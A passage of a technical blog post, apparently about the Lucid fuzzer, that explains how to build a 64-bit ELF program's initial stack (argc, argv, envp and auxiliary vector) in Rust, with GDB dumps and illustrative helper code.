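<p>Here is a rough sketch of how the <code class="language-plaintext highlighter-rouge">argc</code>/<code class="language-plaintext highlighter-rouge">argv</code>/<code class="language-plaintext highlighter-rouge">envp</code> portion of that layout could be fabricated for a 64-bit process, where every slot is 8 bytes instead of 4. It only computes addresses and the words to write, it doesn’t touch any real stack memory. <code class="language-plaintext highlighter-rouge">place_strings</code> and <code class="language-plaintext highlighter-rouge">build_arg_words</code> are hypothetical helpers for illustration and are not the functions Lucid uses.</p>

```rust
// Reserve room for each NUL-terminated string, growing downward from `top`.
// Returns the address assigned to each string and the lowest address used
pub fn place_strings(top: u64, strings: &[&str]) -> (Vec<u64>, u64) {
    let mut cursor = top;
    let mut addrs = Vec::new();
    for s in strings {
        // +1 for the terminating NUL byte
        cursor -= s.len() as u64 + 1;
        addrs.push(cursor);
    }
    (addrs, cursor)
}

// Build the 8-byte words that sit at the stack pointer, in ascending address
// order: argc, the argv pointers, NULL, the envp pointers, NULL
pub fn build_arg_words(argv_ptrs: &[u64], envp_ptrs: &[u64]) -> Vec<u64> {
    let mut words = Vec::with_capacity(argv_ptrs.len() + envp_ptrs.len() + 3);
    words.push(argv_ptrs.len() as u64); // argc
    words.extend_from_slice(argv_ptrs); // argv[0..n]
    words.push(0);                      // argv terminator
    words.extend_from_slice(envp_ptrs); // envp[0..m]
    words.push(0);                      // envp terminator
    words
}
```

<p>For <code class="language-plaintext highlighter-rouge">ls / -laht</code> with no environment variables, the words would be <code class="language-plaintext highlighter-rouge">3</code>, three string pointers, and then two <code class="language-plaintext highlighter-rouge">NULL</code>s. The auxiliary vector would be appended right after the second <code class="language-plaintext highlighter-rouge">NULL</code>.</p>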

<p>Next is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. On our 64-bit target, the auxiliary entries in the vector are 16 bytes apiece (the 8-byte size in the diagram above applies to 32-bit). They comprise a key and a value just like our environment variable entries, but these are basically u64 values. For the <code class="language-plaintext highlighter-rouge">test</code> program, we can actually dump the auxiliary information by using <code class="language-plaintext highlighter-rouge">info aux</code> under GDB.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤  info aux
33   AT_SYSINFO_EHDR      System-supplied DSO's ELF header 0x7ffff7f2e000
51   ???                                                 0xe30
16   AT_HWCAP             Machine-dependent CPU capability hints 0x1f8bfbff
6    AT_PAGESZ            System page size               4096
17   AT_CLKTCK            Frequency of times()           100
3    AT_PHDR              Program headers for program    0x7ffff7f30040
4    AT_PHENT             Size of program header entry   56
5    AT_PHNUM             Number of program headers      12
7    AT_BASE              Base address of interpreter    0x0
8    AT_FLAGS             Flags                          0x0
9    AT_ENTRY             Entry point of program         0x7ffff7f39f50
11   AT_UID               Real user ID                   1000
12   AT_EUID              Effective user ID              1000
13   AT_GID               Real group ID                  1000
14   AT_EGID              Effective group ID             1000
23   AT_SECURE            Boolean, was exec setuid-like? 0
25   AT_RANDOM            Address of 16 random bytes     0x7fffffffe3b9
26   AT_HWCAP2            Extension of AT_HWCAP          0x2
31   AT_EXECFN            File name of executable        0x7fffffffefe2 "/home/dude/lucid/test"
15   AT_PLATFORM          String identifying platform    0x7fffffffe3c9 "x86_64"
0    AT_NULL              End of vector                  0x0
</span></code></pre></div></div>

<p>The keys are on the left and the values are on the right. For instance, on the stack we can expect the key 0x5 for <code class="language-plaintext highlighter-rouge">AT_PHNUM</code>, which describes the number of Program Headers, to be accompanied by <code class="language-plaintext highlighter-rouge">12</code> as the value. We can dump the stack and see this in action as well.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">gef➤  x/400gx $</span>rsp
<span class="go">0x7fffffffe0b0:	0x0000000000000001	0x00007fffffffe3d6
0x7fffffffe0c0:	0x0000000000000000	0x00007fffffffe3ec
0x7fffffffe0d0:	0x00007fffffffe3fc	0x00007fffffffe44e
0x7fffffffe0e0:	0x00007fffffffe461	0x00007fffffffe475
0x7fffffffe0f0:	0x00007fffffffe4a2	0x00007fffffffe4b9
0x7fffffffe100:	0x00007fffffffe4e5	0x00007fffffffe505
0x7fffffffe110:	0x00007fffffffe52e	0x00007fffffffe542
0x7fffffffe120:	0x00007fffffffe559	0x00007fffffffe56c
0x7fffffffe130:	0x00007fffffffe588	0x00007fffffffe59d
0x7fffffffe140:	0x00007fffffffe5b8	0x00007fffffffe5c5
0x7fffffffe150:	0x00007fffffffe5da	0x00007fffffffe60e
0x7fffffffe160:	0x00007fffffffe61d	0x00007fffffffe646
0x7fffffffe170:	0x00007fffffffe667	0x00007fffffffe674
0x7fffffffe180:	0x00007fffffffe67d	0x00007fffffffe68d
0x7fffffffe190:	0x00007fffffffe69b	0x00007fffffffe6ad
0x7fffffffe1a0:	0x00007fffffffe6be	0x00007fffffffeca0
0x7fffffffe1b0:	0x00007fffffffecc1	0x00007fffffffeccd
0x7fffffffe1c0:	0x00007fffffffecde	0x00007fffffffed34
0x7fffffffe1d0:	0x00007fffffffed63	0x00007fffffffed73
0x7fffffffe1e0:	0x00007fffffffed8b	0x00007fffffffedad
0x7fffffffe1f0:	0x00007fffffffedc4	0x00007fffffffedd8
0x7fffffffe200:	0x00007fffffffedf8	0x00007fffffffee02
0x7fffffffe210:	0x00007fffffffee21	0x00007fffffffee2c
0x7fffffffe220:	0x00007fffffffee34	0x00007fffffffee46
0x7fffffffe230:	0x00007fffffffee65	0x00007fffffffee7c
0x7fffffffe240:	0x00007fffffffeed1	0x00007fffffffef7b
0x7fffffffe250:	0x00007fffffffef8d	0x00007fffffffefc3
0x7fffffffe260:	0x0000000000000000	0x0000000000000021
0x7fffffffe270:	0x00007ffff7f2e000	0x0000000000000033
0x7fffffffe280:	0x0000000000000e30	0x0000000000000010
0x7fffffffe290:	0x000000001f8bfbff	0x0000000000000006
0x7fffffffe2a0:	0x0000000000001000	0x0000000000000011
0x7fffffffe2b0:	0x0000000000000064	0x0000000000000003
0x7fffffffe2c0:	0x00007ffff7f30040	0x0000000000000004
0x7fffffffe2d0:	0x0000000000000038	0x0000000000000005
0x7fffffffe2e0:	0x000000000000000c	0x0000000000000007
</span></code></pre></div></div>

<p>Towards the end of the data, at <code class="language-plaintext highlighter-rouge">0x7fffffffe2d8</code>, we can see the key <code class="language-plaintext highlighter-rouge">0x5</code>, and at <code class="language-plaintext highlighter-rouge">0x7fffffffe2e0</code> we can see the value <code class="language-plaintext highlighter-rouge">0xc</code>, which is 12 in decimal. We need some of these in order to load our ELF properly, as the ELF <code class="language-plaintext highlighter-rouge">_start</code> routine requires some of them in order to set the environment up properly. The ones I included on my stack were the following; they might not all be necessary:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">AT_ENTRY</code> which holds the program entry point,</li>
  <li><code class="language-plaintext highlighter-rouge">AT_PHDR</code> which is a pointer to the program header data,</li>
  <li><code class="language-plaintext highlighter-rouge">AT_PHNUM</code> which is the number of program headers,</li>
  <li><code class="language-plaintext highlighter-rouge">AT_RANDOM</code> which is a pointer to 16 random bytes that the kernel is supposed to place for the program. This 16-byte value serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information because I ended up with a NULL-ptr deref during my initial testing. When I then placed this auxv pair with a value of <code class="language-plaintext highlighter-rouge">0x4141414141414141</code>, I ended up crashing trying to access that address. For our purposes, we don’t really care that the stack canary values are cryptographically secure, so I just placed another pointer to the program entry as that is guaranteed to exist.</li>
  <li><code class="language-plaintext highlighter-rouge">AT_NULL</code> which is used to terminate the auxiliary vector</li>
</ul>

<p>So with those values all accounted for, we now know all of the data we need to construct the program’s stack.</p>
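<p>To make the key/value layout concrete, here is a minimal sketch of walking an auxiliary vector in Rust. The <code class="language-plaintext highlighter-rouge">auxv_lookup</code> helper is a hypothetical name for this example and not part of Lucid. The pairs are copied from the stack dump above, starting at <code class="language-plaintext highlighter-rouge">0x7fffffffe268</code>. The dump is cut off right after <code class="language-plaintext highlighter-rouge">AT_PHNUM</code>, so the <code class="language-plaintext highlighter-rouge">AT_NULL</code> terminator is added by hand as an assumption.</p>

```rust
const AT_NULL: u64 = 0;
const AT_PAGESZ: u64 = 6;
const AT_PHNUM: u64 = 5;
const AT_RANDOM: u64 = 25;

// Hypothetical helper: walks (key, value) pairs until AT_NULL and returns the
// value stored for `key`, if that key is present
fn auxv_lookup(auxv: &[u64], key: u64) -> Option<u64> {
    auxv.chunks_exact(2)
        .map(|pair| (pair[0], pair[1]))
        .take_while(|&(k, _)| k != AT_NULL)
        .find(|&(k, _)| k == key)
        .map(|(_, v)| v)
}

fn main() {
    // Key/value pairs as they appear in the dump, lowest address first
    let auxv: &[u64] = &[
        0x21, 0x7ffff7f2e000, // key 33
        0x33, 0xe30,          // key 51
        0x10, 0x1f8bfbff,     // AT_HWCAP
        0x06, 0x1000,         // AT_PAGESZ
        0x11, 0x64,           // AT_CLKTCK
        0x03, 0x7ffff7f30040, // AT_PHDR
        0x04, 0x38,           // AT_PHENT
        0x05, 0x0c,           // AT_PHNUM
        0x00, 0x00,           // AT_NULL, added here because the dump is truncated
    ];

    assert_eq!(auxv_lookup(auxv, AT_PHNUM), Some(12));
    assert_eq!(auxv_lookup(auxv, AT_PAGESZ), Some(4096));

    // AT_RANDOM is not in this truncated copy, so the lookup comes back empty
    assert_eq!(auxv_lookup(auxv, AT_RANDOM), None);
}
```

<p>A program’s startup code does roughly the same walk over the real vector, which is why a missing or bogus <code class="language-plaintext highlighter-rouge">AT_RANDOM</code> entry shows up as a crash so early.</p>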

<h2 id="allocating-the-stack">Allocating the Stack</h2>
<p>First, we need to allocate memory to hold the Bochs stack since we will need to know the address it’s mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we won’t know what the absolute addresses are unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward as I just used <code class="language-plaintext highlighter-rouge">mmap</code> the same way we did with the program segments. Right now I’m using a <code class="language-plaintext highlighter-rouge">1MB</code> stack which seems to be large enough.</p>

<h2 id="constructing-the-stack-data">Constructing the Stack Data</h2>
<p>In my stack creation logic, I built the stack starting from the bottom and then inserted each new value on top of it.</p>

<p>So the first value we place onto the stack is the “end-marker” from the diagram which is just a <code class="language-plaintext highlighter-rouge">0u64</code> in Rust.</p>

<p>Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument <code class="language-plaintext highlighter-rouge">--bochs-args</code> which is meant to serve as a delineation point between the two argument categories. Every argument after <code class="language-plaintext highlighter-rouge">--bochs-args</code> is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute address for when we need to place pointers to the strings in the <code class="language-plaintext highlighter-rouge">argv</code> vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string pushing routine just so we didn’t have to deal with any weird pointer values. This isn’t necessary but makes the stack state easier for me to reason about. This is performed with the following logic:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Create a vector to hold all of our stack data</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">stack_data</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

<span class="c1">// Add the "end-marker" NULL, we're skipping adding any envvar strings for</span>
<span class="c1">// now</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>

<span class="c1">// Parse the argv entries for Bochs</span>
<span class="k">let</span> <span class="n">args</span> <span class="o">=</span> <span class="nf">parse_bochs_args</span><span class="p">();</span>

<span class="c1">// Store the length of the strings including padding</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">arg_lens</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

<span class="c1">// For each argument, push a string onto the stack and store its offset </span>
<span class="c1">// location</span>
<span class="k">for</span> <span class="n">arg</span> <span class="k">in</span> <span class="n">args</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">let</span> <span class="n">old_len</span> <span class="o">=</span> <span class="n">stack_data</span><span class="nf">.len</span><span class="p">();</span>
    <span class="nf">push_string</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">arg</span><span class="nf">.to_string</span><span class="p">());</span>

    <span class="c1">// Calculate arg length and store it</span>
    <span class="k">let</span> <span class="n">arg_len</span> <span class="o">=</span> <span class="n">stack_data</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="n">old_len</span><span class="p">;</span>
    <span class="n">arg_lens</span><span class="nf">.push</span><span class="p">(</span><span class="n">arg_len</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
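<p>The post doesn’t show <code class="language-plaintext highlighter-rouge">parse_bochs_args</code>, so here is a minimal sketch of how the <code class="language-plaintext highlighter-rouge">--bochs-args</code> split could work. The function name <code class="language-plaintext highlighter-rouge">split_bochs_args</code> and the hardcoded <code class="language-plaintext highlighter-rouge">./bochs</code> placeholder for <code class="language-plaintext highlighter-rouge">argv[0]</code> are assumptions for this example. The real implementation in Lucid may differ.</p>

```rust
// Hypothetical stand-in for parse_bochs_args(): keeps everything that appears
// after `--bochs-args` and puts a placeholder program name in front as argv[0]
fn split_bochs_args<I: IntoIterator<Item = String>>(cli: I) -> Vec<String> {
    let mut args = vec![String::from("./bochs")];

    // Skip the fuzzer's own arguments, then skip the delimiter itself
    args.extend(
        cli.into_iter()
            .skip_while(|arg| arg.as_str() != "--bochs-args")
            .skip(1),
    );

    args
}

fn main() {
    let args = split_bochs_args(std::env::args());
    println!("Bochs argv: {:?}", args);
}
```

<p>If the delimiter never appears, this sketch hands Bochs nothing but the placeholder <code class="language-plaintext highlighter-rouge">argv[0]</code>.</p>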

<p>Pushing strings is performed like this:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Pushes a NULL terminated string onto the "stack" and pads the string with </span>
<span class="c1">// NULL bytes until we achieve 8-byte alignment</span>
<span class="k">fn</span> <span class="nf">push_string</span><span class="p">(</span><span class="n">stack</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u8</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">string</span><span class="p">:</span> <span class="nb">String</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Convert the string to bytes and append it to the stack</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">bytes</span> <span class="o">=</span> <span class="n">string</span><span class="nf">.as_bytes</span><span class="p">()</span><span class="nf">.to_vec</span><span class="p">();</span>

    <span class="c1">// Add a NULL terminator</span>
    <span class="n">bytes</span><span class="nf">.push</span><span class="p">(</span><span class="mi">0x0</span><span class="p">);</span>

    <span class="c1">// We're adding bytes in reverse because we're adding to index 0 always,</span>
    <span class="c1">// we want to pad these strings so that they remain 8-byte aligned so that</span>
    <span class="c1">// the stack is easier to reason about imo</span>
    <span class="k">if</span> <span class="n">bytes</span><span class="nf">.len</span><span class="p">()</span> <span class="o">%</span> <span class="n">U64_SIZE</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="k">let</span> <span class="n">pad</span> <span class="o">=</span> <span class="n">U64_SIZE</span> <span class="o">-</span> <span class="p">(</span><span class="n">bytes</span><span class="nf">.len</span><span class="p">()</span> <span class="o">%</span> <span class="n">U64_SIZE</span><span class="p">);</span>
        <span class="k">for</span> <span class="n">_</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">pad</span> <span class="p">{</span> <span class="n">bytes</span><span class="nf">.push</span><span class="p">(</span><span class="mi">0x0</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">for</span> <span class="o">&amp;</span><span class="n">byte</span> <span class="k">in</span> <span class="n">bytes</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.rev</span><span class="p">()</span> <span class="p">{</span>
        <span class="n">stack</span><span class="nf">.insert</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">byte</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Then we add some padding and the auxiliary vector members:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Add some padding</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>

<span class="c1">// Next we need to set up the auxiliary vectors, terminate the vector with</span>
<span class="c1">// the AT_NULL key which is 0, with a value of 0</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>

<span class="c1">// Add the AT_ENTRY key which is 9, along with the value from the Elf header</span>
<span class="c1">// for the program's entry point. We need to calculate the absolute address</span>
<span class="c1">// by adding the load base to the entry offset</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">elf</span><span class="py">.elf_header.entry</span> <span class="o">+</span> <span class="n">base</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">9u64</span><span class="p">);</span>

<span class="c1">// Add the AT_PHDR key which is 3, along with the address of the program</span>
<span class="c1">// headers which is just ELF_HDR_SIZE away from the base</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">ELF_HDR_SIZE</span><span class="p">)</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">3u64</span><span class="p">);</span>

<span class="c1">// Add the AT_PHNUM key which is 5, along with the number of program headers</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">elf</span><span class="py">.program_headers</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">5u64</span><span class="p">);</span>

<span class="c1">// Add AT_RANDOM key which is 25, this is where the start routines will </span>
<span class="c1">// expect 16 bytes of random data as a seed to generate stack canaries, we</span>
<span class="c1">// can just use the entry again since we don't care about security</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">elf</span><span class="py">.elf_header.entry</span> <span class="o">+</span> <span class="n">base</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">25u64</span><span class="p">);</span>
</code></pre></div></div>
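<p>Notice that each auxiliary vector value is pushed before its key. The <code class="language-plaintext highlighter-rouge">push_u64</code> helper isn’t shown in the post, so the sketch below assumes it mirrors <code class="language-plaintext highlighter-rouge">push_string</code> and inserts bytes at index 0. Under that assumption, whatever is pushed last ends up at the lowest address, so the key has to go on after the value. <code class="language-plaintext highlighter-rouge">push_auxv</code> is a hypothetical wrapper added for the example.</p>

```rust
// Assumed shape of push_u64: prepend the little-endian bytes of `value` so
// that they become the new "top" (lowest address) of the stack data
fn push_u64(stack: &mut Vec<u8>, value: u64) {
    for &byte in value.to_le_bytes().iter().rev() {
        stack.insert(0, byte);
    }
}

// Hypothetical wrapper: pushes the value first and the key second, so the key
// lands at the lower address, right in front of its value
fn push_auxv(stack: &mut Vec<u8>, key: u64, value: u64) {
    push_u64(stack, value);
    push_u64(stack, key);
}

fn main() {
    let mut stack_data = Vec::new();

    // AT_NULL terminator goes on first since it sits at the highest address
    push_auxv(&mut stack_data, 0, 0);

    // AT_PHNUM (5) with 12 program headers
    push_auxv(&mut stack_data, 5, 12);

    // Reading upward from the top: key, value, then the terminator pair
    assert_eq!(&stack_data[0..8], &5u64.to_le_bytes());
    assert_eq!(&stack_data[8..16], &12u64.to_le_bytes());
    assert_eq!(&stack_data[16..32], &[0u8; 16]);
}
```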

<p>Then, since we ignored the environment variables, we just push a <code class="language-plaintext highlighter-rouge">NULL</code> pointer onto the stack and also the <code class="language-plaintext highlighter-rouge">NULL</code> pointer terminating the <code class="language-plaintext highlighter-rouge">argv</code> vector:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Since we skipped envvars for now, envp[0] is going to be NULL</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>

<span class="c1">// argv[n] is a NULL</span>
<span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="mi">0u64</span><span class="p">);</span>
</code></pre></div></div>

<p>This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists which includes the strings, and we know how many pointers and members we have left to add to the stack (number of args and <code class="language-plaintext highlighter-rouge">argc</code>). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the <code class="language-plaintext highlighter-rouge">argv</code> pointers onto the stack. We calculate the length as follows:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// At this point, we have all the information we need to calculate the total</span>
<span class="c1">// length of the stack. We're missing the argv pointers and finally argc</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">stack_length</span> <span class="o">=</span> <span class="n">stack_data</span><span class="nf">.len</span><span class="p">();</span>

<span class="c1">// Add argv pointers</span>
<span class="n">stack_length</span> <span class="o">+=</span> <span class="n">args</span><span class="nf">.len</span><span class="p">()</span> <span class="o">*</span> <span class="n">POINTER_SIZE</span><span class="p">;</span>

<span class="c1">// Add argc</span>
<span class="n">stack_length</span> <span class="o">+=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nn">size_of</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">u64</span><span class="o">&gt;</span><span class="p">();</span>
</code></pre></div></div>

<p>Next, we start at the bottom of the stack and create a movable <code class="language-plaintext highlighter-rouge">offset</code> which will track through the stack stopping at the beginning of each string so that we can calculate its absolute address. The <code class="language-plaintext highlighter-rouge">offset</code> represents how deep into the stack from the top we are. At first, the <code class="language-plaintext highlighter-rouge">offset</code> is the largest value it can be because it’s at the bottom of the stack (higher-memory address). We subtract from it in order to point us towards the beginning of each <code class="language-plaintext highlighter-rouge">argv</code> string we pushed onto the stack. So the bottom of the stack looks something like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NULL
string_1
string_2
end-marker &lt;--- offset
</code></pre></div></div>

<p>So armed with the arguments and their lengths that we recorded, we can adjust the <code class="language-plaintext highlighter-rouge">offset</code> each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though: on the first iteration, we have to account for the end-marker and its 8 bytes. So this is how the logic goes:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Right now our offset is at the bottom of the stack, for the first</span>
<span class="c1">// argument calculation, we have to accommodate the "end-marker" that we added</span>
<span class="c1">// to the stack at the beginning. So we need to move the offset up the size</span>
<span class="c1">// of the end-marker and then the size of the argument itself. After that,</span>
<span class="c1">// we only have to accommodate the argument lengths when moving the offset</span>
<span class="k">for</span> <span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">arg_len</span><span class="p">)</span> <span class="k">in</span> <span class="n">arg_lens</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.enumerate</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// First argument, account for end-marker</span>
    <span class="k">if</span> <span class="n">idx</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="n">curr_offset</span> <span class="o">-=</span> <span class="n">arg_len</span> <span class="o">+</span> <span class="n">U64_SIZE</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="c1">// Not the first argument, just account for the string length</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">curr_offset</span> <span class="o">-=</span> <span class="n">arg_len</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="c1">// Calculate the absolute address</span>
    <span class="k">let</span> <span class="n">absolute_addr</span> <span class="o">=</span> <span class="p">(</span><span class="n">stack_addr</span> <span class="o">+</span> <span class="n">curr_offset</span><span class="p">)</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

    <span class="c1">// Push the absolute address onto the stack</span>
    <span class="nf">push_u64</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack_data</span><span class="p">,</span> <span class="n">absolute_addr</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
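<p>Since this pointer math is easy to get wrong, here is a small self-contained sketch that rebuilds a reduced version of the stack and checks that every <code class="language-plaintext highlighter-rouge">argv</code> pointer lands on the right string. It makes a few assumptions that the snippets above don’t confirm: <code class="language-plaintext highlighter-rouge">curr_offset</code> starts at the final stack length, index 0 of the vector ends up at <code class="language-plaintext highlighter-rouge">stack_addr</code>, and the arguments are walked in reverse so that the pointer for <code class="language-plaintext highlighter-rouge">argv[0]</code> is pushed last. The helpers <code class="language-plaintext highlighter-rouge">build_stack</code>, <code class="language-plaintext highlighter-rouge">read_u64</code>, and <code class="language-plaintext highlighter-rouge">read_cstr</code> are hypothetical, and only the <code class="language-plaintext highlighter-rouge">AT_NULL</code> pair of the auxiliary vector is included.</p>

```rust
const U64_SIZE: usize = std::mem::size_of::<u64>();

// Assumed helper: prepend a little-endian u64 at index 0 (the "top")
fn push_u64(stack: &mut Vec<u8>, value: u64) {
    for &byte in value.to_le_bytes().iter().rev() {
        stack.insert(0, byte);
    }
}

// Same rule as push_string in the post: NULL-terminate, pad to 8 bytes
fn push_string(stack: &mut Vec<u8>, string: &str) {
    let mut bytes = string.as_bytes().to_vec();
    bytes.push(0);
    while bytes.len() % U64_SIZE != 0 {
        bytes.push(0);
    }
    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);
    }
}

// Builds: argc, argv pointers, NULL, envp NULL, AT_NULL pair, padding,
// strings, end-marker. `stack_addr` is where index 0 is assumed to live
fn build_stack(argv: &[&str], stack_addr: usize) -> Vec<u8> {
    let mut data = Vec::new();
    push_u64(&mut data, 0); // end-marker

    // Assumption: walk argv in reverse so argv[0]'s pointer is pushed last
    let mut arg_lens = Vec::new();
    for arg in argv.iter().rev() {
        let old_len = data.len();
        push_string(&mut data, arg);
        arg_lens.push(data.len() - old_len);
    }

    push_u64(&mut data, 0); // padding
    push_u64(&mut data, 0); // AT_NULL value
    push_u64(&mut data, 0); // AT_NULL key
    push_u64(&mut data, 0); // envp[0] = NULL
    push_u64(&mut data, 0); // argv[n] = NULL

    // Final length once the argv pointers and argc have been added
    let stack_length = data.len() + argv.len() * U64_SIZE + U64_SIZE;

    // Start at the bottom and move up one string at a time
    let mut curr_offset = stack_length;
    for (idx, arg_len) in arg_lens.iter().enumerate() {
        curr_offset -= if idx == 0 { arg_len + U64_SIZE } else { *arg_len };
        push_u64(&mut data, (stack_addr + curr_offset) as u64);
    }

    push_u64(&mut data, argv.len() as u64); // argc
    data
}

// Reads a little-endian u64 at `offset` from the top of the stack data
fn read_u64(data: &[u8], offset: usize) -> u64 {
    let mut buf = [0u8; 8];
    buf.copy_from_slice(&data[offset..offset + U64_SIZE]);
    u64::from_le_bytes(buf)
}

// Follows an absolute pointer back into the vector and reads the C string
fn read_cstr(data: &[u8], stack_addr: usize, ptr: u64) -> String {
    let start = ptr as usize - stack_addr;
    let len = data[start..].iter().position(|&b| b == 0).unwrap();
    String::from_utf8_lossy(&data[start..start + len]).into_owned()
}

fn main() {
    let argv = ["./bochs", "-AAAAA", "-BBBBBBBBBB"];
    let stack_addr = 0x7000_0000_0000usize; // made-up address for the demo
    let data = build_stack(&argv, stack_addr);

    // argc sits on top, followed by the argv pointers in order
    assert_eq!(read_u64(&data, 0), argv.len() as u64);
    for (i, arg) in argv.iter().enumerate() {
        let ptr = read_u64(&data, U64_SIZE * (i + 1));
        assert_eq!(read_cstr(&data, stack_addr, ptr), *arg);
    }
}
```

<p>A round-trip check like this is a cheap way to catch an off-by-eight in the offset logic before jumping into the loaded program.</p>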

<p>It’s pretty cool! And it seems to work? Finally we cap the stack off with <code class="language-plaintext highlighter-rouge">argc</code> and we are done populating all of the stack data in a vector. Next, we’ll want to actually copy the data onto the stack allocation which is straightforward so no code snippet there.</p>

